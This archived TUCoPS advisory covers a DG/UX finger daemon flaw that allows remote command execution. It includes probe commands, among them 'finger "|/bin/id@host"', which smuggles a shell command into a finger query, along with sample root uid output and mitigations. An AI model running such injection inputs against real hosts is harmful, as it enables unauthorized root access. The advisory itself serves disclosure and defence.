Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: finger-3.htm

In.fingerd for dgux has the same old finger daemon bug



Vulnerability

    in.fingerd

Affected

    DGUX

Description

    George Imburgia posted about another old bug that won't die.   The
    finger daemon  that ships  with dgux  will allow  a remote user to
    pipe commands, often with uid root or bin.

    To  check  for  this  vulnerability,  simply use the RFC compliant
    syntax;

        finger /W@host

    If it returns something like this, it may be vulnerable;

        Login name: /W                          In real life: ???

    To see the uid in.fingerd is running as, try this;

        finger "|/bin/id@host"

    Often, you will see something like this;

        uid=0(root) gid=0(root)

    or;

        uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

Solution

    1) disable fingerd,
    2) use  tcpwrappers,  and  have  a  wrapper program check for  the
       offending pipe and other shell specials,
    3) find  a third  party fingerd  that DOESN'T  have this wide open
       door to root.

    Apparently it's fixed in MU03.  DG/UX is officially up to 4.11MU04
    with 4.20 coming soon.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH